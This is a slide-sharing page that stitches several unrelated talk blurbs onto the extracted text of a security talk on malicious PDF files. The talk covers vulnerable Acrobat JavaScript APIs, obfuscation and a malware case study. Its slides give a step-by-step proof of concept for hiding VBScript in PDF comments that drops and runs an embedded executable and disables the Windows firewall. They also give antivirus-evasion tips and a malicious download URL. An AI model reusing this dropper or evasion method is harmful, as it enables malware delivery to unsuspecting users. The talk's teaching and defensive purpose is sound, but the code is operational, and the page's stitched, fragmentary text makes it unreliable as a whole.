In this webinar, we explored essential aspects of Customer Journey Management and personalization. Here’s a summary of the key insights and topics discussed:
Key Takeaways:
Understanding the Customer Journey: Dr. Hill emphasized the importance of mapping and understanding the complete customer journey to identify touchpoints and opportunities for improvement.
Personalization Strategies: We discussed how to leverage data and insights to create personalized experiences that resonate with customers.
Technology Integration: Insights were shared on how inQuba’s advanced technology can streamline customer interactions and drive operational efficiency.
ScyllaDB is making a major architecture shift. We’re moving from vNode replication to tablets – fragments of tables that are distributed independently, enabling dynamic data distribution and extreme elasticity. In this keynote, ScyllaDB co-founder and CTO Avi Kivity explains the reason for this shift, provides a look at the implementation and roadmap, and shares how this shift benefits ScyllaDB users.
Dandelion Hashtable: beyond billion requests per second on a commodity serverAntonios Katsarakis
This slide deck presents DLHT, a concurrent in-memory hashtable. Despite efforts to optimize hashtables, that go as far as sacrificing core functionality, state-of-the-art designs still incur multiple memory accesses per request and block request processing in three cases. First, most hashtables block while waiting for data to be retrieved from memory. Second, open-addressing designs, which represent the current state-of-the-art, either cannot free index slots on deletes or must block all requests to do so. Third, index resizes block every request until all objects are copied to the new index. Defying folklore wisdom, DLHT forgoes open-addressing and adopts a fully-featured and memory-aware closed-addressing design based on bounded cache-line-chaining. This design offers lock-free index operations and deletes that free slots instantly, (2) completes most requests with a single memory access, (3) utilizes software prefetching to hide memory latencies, and (4) employs a novel non-blocking and parallel resizing. In a commodity server and a memory-resident workload, DLHT surpasses 1.6B requests per second and provides 3.5x (12x) the throughput of the state-of-the-art closed-addressing (open-addressing) resizable hashtable on Gets (Deletes).
"Choosing proper type of scaling", Olena SyrotaFwdays
Imagine an IoT processing system that is already quite mature and production-ready and for which client coverage is growing and scaling and performance aspects are life and death questions. The system has Redis, MongoDB, and stream processing based on ksqldb. In this talk, firstly, we will analyze scaling approaches and then select the proper ones for our system.
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving
Manufacturing custom quality metal nameplates and badges involves several standard operations. Processes include sheet prep, lithography, screening, coating, punch press and inspection. All decoration is completed in the flat sheet with adhesive and tooling operations following. The possibilities for creating unique durable nameplates are endless. How will you create your brand identity? We can help!
Northern Engraving | Modern Metal Trim, Nameplates and Appliance PanelsNorthern Engraving
What began over 115 years ago as a supplier of precision gauges to the automotive industry has evolved into being an industry leader in the manufacture of product branding, automotive cockpit trim and decorative appliance trim. Value-added services include in-house Design, Engineering, Program Management, Test Lab and Tool Shops.
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor IvaniukFwdays
At this talk we will discuss DDoS protection tools and best practices, discuss network architectures and what AWS has to offer. Also, we will look into one of the largest DDoS attacks on Ukrainian infrastructure that happened in February 2022. We'll see, what techniques helped to keep the web resources available for Ukrainians and how AWS improved DDoS protection for all customers based on Ukraine experience
Conversational agents, or chatbots, are increasingly used to access all sorts of services using natural language. While open-domain chatbots - like ChatGPT - can converse on any topic, task-oriented chatbots - the focus of this paper - are designed for specific tasks, like booking a flight, obtaining customer support, or setting an appointment. Like any other software, task-oriented chatbots need to be properly tested, usually by defining and executing test scenarios (i.e., sequences of user-chatbot interactions). However, there is currently a lack of methods to quantify the completeness and strength of such test scenarios, which can lead to low-quality tests, and hence to buggy chatbots.
To fill this gap, we propose adapting mutation testing (MuT) for task-oriented chatbots. To this end, we introduce a set of mutation operators that emulate faults in chatbot designs, an architecture that enables MuT on chatbots built using heterogeneous technologies, and a practical realisation as an Eclipse plugin. Moreover, we evaluate the applicability, effectiveness and efficiency of our approach on open-source chatbots, with promising results.
3. About PDF
• What isPDF?
• Incidentsin thewild
• Why pdf attcks?
• PDF document structure
4. Potentially Dangerous File / Penetration
Document Format
Stands for Adobe Portable Document Format
Exchange and manipulation of electronic data
reliable and platform independent
Has become most widespread and used document
description format throughout the world
5. Adobe PDF – As a programming language
PDF document is more than a powerful document
format
Has a complete programming language of its own
Dedicated to document creation and manipulation
Relatively strong execution features
9. Incidents in the wild
Jun 14 CVE-2010-1297 PDF Adobe 0-Day WEO from sacchetti.dana@gmail.com
Jun 20 CVE-2010-1297 PDF Meeting agenda from alexis.mo88@gmail.com
Jun 21 CVE-2010-1297 PDF About the recent US-Japan Economic Relations
Jun 21 CVE-2010-1297 PDF Adobe 0-Day About the recent US-Japan Economic
Relations - with Poison Ivy
Jun 27 CVE-2009-0927 PDF Discussion on cross-strait maritime cooperation
Jul 6 CVE-2010-1297 PDF EPA's Water Sampling Report from spoofed
OCSPP@epa.go
Jul 14 CVE-2009-4324 PDF President Obama's Detrimental Deadlines
10. The Reign of Zeus:
Zeus (also known as Zbot, PRG, Wsnpoem, Gorhax
and Kneber) is a Trojan horse that steals banking
information by keystroke logging.
Found in July 2007 when it was used to steal
information from the United States Department of
Transportation. It became more widespread in
March 2009.
In June 2009, security company Prevx discovered
that Zeus had compromised over 74,000 FTP
accounts on websites of companies like: Bank of
America, NASA, Monster, ABC, Oracle, Cisco,
Amazon, BusinessWeek
ZeuS is sold in the criminal underground as a kit
for around $3000-$4000, and is likely the one
malware most utilized by criminals specializing in
financial fraud. ZeuS has evolved over time and
includes a full arsenal of information stealing .
11. The Reign of Zeus
A recent
breakthrough in
spreading Zeus via
PDF files threatens to
further the spread of
Zeus. The pdf file
(detected as
Exploit.JS.Pdfka.bui)
contained an exploit
for the CVE-2010-
0188 vulnerability -
buffer overflow –
manifests itself when
the field containing
the image is
accessed.
CVE-2010-0188 exploits statistics 2010
13. Apple iPhone / iPad / iPod Code Execution
and Sandbox Bypass
VUPEN ID - VUPEN/ADV-2010-1992
Release date - 2010-08-03
It is caused by a memory corruption
error when processing Compact Font
Format (CFF) data within a PDF
document, which could be exploited by
attackers to execute arbitrary code by
tricking a user into visiting a specially
crafted web page using Mobile Safari
14. Why PDF
Popularity and usability
Flexibility, platform
independent, rich text
Trust level is high on pdf –
static piece of information
Rich api, easy to exploit /
misuse
Dominance of Adobe reader,
huge scope for attack
15. PDF document structure
The general
structure of a PDF
file is composed of
the following code
components:
header, body, cross-
reference (xref)
table, and trailer, as
shown in figure 1.
17. Launch Action
• Launch Action Api
• SomeExamples
• Evading Antivirus
• With embedded EXE
18. Launch Action Vulnerability
A launch action launches an application or opens or prints a document.
Following are the action dictionary entries specific to this type of action.
ENTRIES
S :Name
Required) The type of action that this dictionary describes; shall be Launch for
a launch action.
F: File specification
(Required if none of the entries Win, Mac, or Unix is present) The application
that shall be launched or the document that shall be opened or printed. If this
entry is absent and the conforming reader does not understand any of the
alternative entries, it shall do nothing.
Win : dictionary
(Optional) A dictionary containing Windows-specific launch parameters.
19. Launch Action Vulnerability
PARAMETERS
F : byte string
(Required) The file name of the application that shall be launched or
the document that shall be opened or printed, in standard Windows
pathname format. If the name string includes a backslash character
(), the backslash shall itself be preceded by a backslash. This value
shall be a simple string; it is not a file specification.
P : byte string
(Optional) A parameter string that shall be passed to the application
designated by the F entry. This entry shall be omitted if F
designates a document.
28. Evading Antivirus by Changing the format
You can take any other
PDF data type and give
it a number by
wrapping it in "obj" and
"endobj". Then later on,
when you want to use
that chunk of data, you
can reference it, by
number, with the "R"
operator.
These two examples are
equivalent to Acrobat
2 0 obj
(Hello World)
Endobj
3 0 obj
<<
/Example 2 0 R
>>
Endobj
3 0 obj
<<
/Example (Hello
World)
>>
endobj
29. Evading Antivirus
What You Can Leave Out
All Page data
All Whitespace, except for End-Of-Line after comments
The version number part of %PDF-1.1
The %%EOF
The xref table
And thus also startxref
Most Object /Types
So what's actually required?
%PDF-anything, but if the file is too confusing for Acrobat, you need at least
the first number. Like %PDF-1.
A trailer with a /Root dictionary for the Catalog
A /Pages dictionary, but this can be empty, just as long as it's a dictionary
type.
An /OpenAction if you want to launch your Javascript upon file open.
The Javascript Action.
32. POC: Launching an Embedded exe
Step 1 : Embed the hex content of the exe in a
vbscript which extracts it out to the file system and
runs it.
Step 2 : Embed that vbscript in the pdf file as
comments.
Step 3 : Launch cmd.exe and create another script
which extracts out the main vbscript from the pdf
and run them both.
33. Step 1 : Embed the hex content of the exe in a
vbscript
Dim b,bl
Function c(d)
c=chr(d)
End Function
b=Array(c(77),c(90),c(144),c(0),c(3),c(0), c(0)....,"")
bl = 3072
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(“helpme.exe", 2, True)
For i = 0 To bl
f.write(b(i))
Next
f.close()
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "netsh firewall set opmode disable", 0, True
WshShell.Run "helpme.exe", 0, False
WshShell.Run "taskkill /IM cmd.exe /F", 0, False
Hex content of
the exe as a
character array
34. Step 2 : Embed the vbscript in the pdf file as
comments
%'SS
%Dim b,bl;Set WshShell = Function c(d);c=chr(d);End
Function;b=Array(c(77),c(90),c(144),c(0),.....,"");bl = 3072;Set fso =
CreateObject("Scripting.FileSystemObject");Set f =
fso.OpenTextFile("helpme.exe", 2, True);For i = 0 To
bl;f.write(b(i));Next;f.close(); Set WshShell =
WScript.CreateObject("WScript.Shell") ;WshShell.Run "netsh
firewall set opmode disable", 0, True;WshShell.Run "helpme.exe",
0, False;WshShell.Run "taskkill /IM cmd.exe /F", 0, False
%'EE
6 0 obj
[/PDF /Text]
endobj
36. Generated VBScript
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True)
pf=f.ReadAll
s=InStr(pf,"'SS")
e=InStr(pf,"'EE")
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile("toexecute.vbs", 2, True)
s = Replace(s,"%","")
s = Replace(s,";",vbcrlf)
z.Write(s)
38. AcroJS
• Acrobat JavaScript is the cross-platform scripting
language of the Adobe® Acrobat® family of products.
• Through JavaScript extensions, the viewer application
and its plug-ins expose much of their functionality to
document authors, form designers, and plug-in
developers.
• This functionality includes the following features,
– Processing forms within the document
– Batch processing collections of PDF documents
– Developing and maintaining online collaboration schemes
– Communicating with local databases
– Controlling multimedia events
39. JavaScript Actions
• A JavaScript action causes a script to be compiled and executed by the
JavaScript interpreter.
• Depending on the nature of the script, various interactive form fields in the
document may update their values or change their visual ap-pearances.
PARAMETERS
/S
Type - name
(Required) The type of action that this dictionary describes; must be
JavaScript for a JavaScript action.
/JS
Type - text string or text stream
(Required) A text string or text stream containing the JavaScript script to be
exe-cuted.
43. Vulnerable APIs
• getIcons() [CVE-2009-0927]
– Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9
before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to
execute arbitrary code via a crafted argument to the getIcon method of a
Collab object, a different vulnerability than CVE-2009-0658.
• Util.printf() [CVE-2008-2992][CVE-2008-1104]
– Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and
earlier allows remote attackers to execute arbitrary code via a PDF file
that calls the util.printf JavaScript function with a crafted format string
argument, a related issue to CVE-2008-1104.
– Stack-based buffer overflow in Foxit Reader before 2.3 build 2912 allows
user-assisted remote attackers to execute arbitrary code via a crafted
PDF file, related to the util.printf JavaScript function and floating point
specifiers in format strings.
44. Vulnerable APIs
• getAnnots() [CVE-2009-1492]
– The getAnnots Doc method in the JavaScript API in Adobe Reader
and Acrobat 9.1, 8.1.4, 7.1.1, and earlier allows remote attackers to
cause a denial of service (memory corruption) or execute arbitrary
code via a PDF file that contains an annotation, and has an
OpenAction entry with JavaScript code that calls this method with
crafted integer arguments.
• customDictionaryOpen() [CVE-2009-1493]
– The customDictionaryOpen spell method in the JavaScript API in
Adobe Reader 9.1, 8.1.4, 7.1.1, and earlier on Linux and UNIX
allows remote attackers to cause a denial of service (memory
corruption) or execute arbitrary code via a PDF file that triggers a
call to this method with a long string in the second argument.
45. Vulnerable APIs
• Doc.media.newPlayer [CVE-2009-4324]
– Use-after-free vulnerability in the Doc.media.newPlayer method in
Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x
before 8.2 on Windows and Mac OS X, allows remote attackers to
execute arbitrary code via a crafted PDF file using ZLib compressed
streams, as exploited in the wild in December 2009.
• Collab.collectEmailInfo [CVE-2007-5659]
– Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and
earlier allow remote attackers to execute arbitrary code via a PDF file
with long arguments to unspecified JavaScript methods. NOTE: this
issue might be subsumed by CVE-2008-0655.
46. Obfuscation Techniques
Why?
To make analysis more difficult
To avoid detection by virus scanners
Ways?
Using javascript Obfuscation
Using Pdf Obfuscations(Filters)
48. Distorting format
Normal Code Obfuscated Code
function execute(data, time)
{
Timelag=5000;
if (time > Timelag)
{
// some code
}
}
function overflow(hex, loop)
{
for (i=0;i<loop;i++)
{
hex = hex + hex;
}
}
function overflow(hex, loop){for
(i=0;i<loop;i++){hex = hex + hex;}}
function overflow(hex, loop) {for
i=0;i<loop;i++){hex = hex + hex;}}
49. Obfuscating Identifiers
Normal Code Obfuscated Code
function execute(data, time)
{
Timelag=5000;
if (time > Timelag)
{
// some code
}
}
function overflow(hex, loop)
{
for (i=0;i<loop;i++)
{
hex = hex + hex;
}
}
function aeiou(lIlIIlI, O0OOOO0OO000OO)
{
WWMWMMWMWMWMW=5000;
if (O0OOOO0OO000OO >
WWMWMWMWMWMW)
{
// some code
}
}
function aimpq(xxwmnnx, pqrtxw)
{
for (dqweaa=0; dqweaa < pqrtxw; dqweaa ++)
{
xxwmnnx = xxwmnnx + xxwmnnx;;
}
}
50. Obfuscating Identifiers – Even Worse
Differentiating with number of underscore characters
function _____(____,__________)
{
______________=5000;
if (__________>______________)
{
// some code
}
}
function ___(_______, ______)
{
for(________________=0; ________________<______;
________________ ++)
{
_______ = _______ + _______;
}
}
51. Obfuscating Identifiers – Even Worse
Differentiating with number of underscore characters
function _____(____,__________){______________=5000;if
(__________>______________){// some code}}function ___(_______,
______){for(________________=0; ________________<______;
________________ ++){_______ = _______ + _______;}}
52. Chain of Eval
Normal Code Obfuscated code
app.alert(“c0c0n”) func="eval";
one='app.alert("c0c0n")';
two=eval(one);
three=eval(two);
eval(func(three));
54. Callee Trick
Function accesses its own source and uses it as a key to decrypt code
or data
function decrypt(cypher)
{
var key = arguments.callee.toString();
for (var i = 0; i < cypher.length; i++)
{
plain = key.charCodeAt(i) ^ cypher.charCodeAt(i);
}
...
}
55. Pdf obfuscations
Using Filters for streams.
Most common encoding techniques -
ASCIIHEXDecode,
ASCII85Decode,
LZWDecode,
FlateDecode,
RunLengthDecode
56. Case Study
Malware found from - www.malwaredomainlist.com
File link www.bigiqwars.ru/ppp/exp/pdf.php?
user=admin&pdf_acces=on
Added on – 29th
july 2010
60. STEP-2
Behavioral Analysis
Environment
• By using vm image
• Filemon,Processmon,Regmon,TCPView
Results
• Under Process ‘AcroRD32.exe’ Was trying to connect
to remote site http://bigiqwars.ru/ppp/exe.php?
spl=PDF (newPlayer)&user=admin&exe_acces=on
71. How can we protect ourselves
• Enable automatic updates: it sounds simple, but you will need to turn it on
in the software settings to make it happen by default.
• Disable PDF browser integration: most browsers will open PDFs without
asking. An infected PDF will deliver its payload without warning, hiding in
the background.
• Always install the latest patch/update, even for older Adobe product
versions.
• Disable Javascript
• Uncheck ‘Allow non-PDF gile attachments with external applications’ to
prevent launch action vulnerability.
• PDF alternatives such as Foxit are worthwhile, as long as auto updates are
turned on, however alternative programs are just as vulnerable to malware
as they gain popularity.
72. Road Ahead
Focus Less on javascript exploits
Attackers focusing more on embedded objects inside
pdf i.e flash
Adobe to introduce sandboxing to limit Reader
exploits
THE ADOBE PORTABLE DOCUMENT FORMAT (PDF) is a file format for rep- resenting documents in a manner independent of the application software, hard- ware, and operating system used to create them and of the output device on which they are to be displayed or printed. A document’s pages (and other visual elements) may contain any combination of text, graphics, and images. A page’s appearance is described by a PDF content stream, which contains a sequence of graphics objects to be painted on the page. This appearance is fully specified; all layout and formatting decisions have al- ready been made by the application generating the content stream. In addition to describing the static appearance of pages, a PDF document may contain interactive elements that are possible only in an electronic representa- tion. PDF supports annotations of many kinds for such things as text notes, hypertext links, markup, file attachments, sounds, and movies. A document can define its own user interface; keyboard and mouse input can trigger actions that are specified by PDF objects. The document can contain interactive form fields to be filled in by the user, and can export the values of these fields to or import them from other applications.
Distorting format – Removing newlines and spaces - Not much of pain to deobfuscate (ex-jsbeautifier.org)
Name obfuscation – variable name and function name are renamed Most common obfuscation techniques
JavaScript code can execute JavaScript code in strings through eval
•Often used to hide later code stages which are decrypted on the fly
•Common way to extract argument: replace eval with a printing function
Not specific to Adobe Reader
•Frequently used by JavaScript code in other contexts
•Function accesses its own source and uses it as a key to decrypt code or data
•Add a single whitespace and decryption fails
Online decoders available to decode them….
We can not hit the pdf file link directly,So we chose WGET to download that file contents
Javascript Found on object 11 0.. Encoded with ascii85Encoding.. First obfuscation – filters…
Second Obfucation – Distorted formatting.
Third Obfuscation – Obfuscated identifiers and unnecessary comments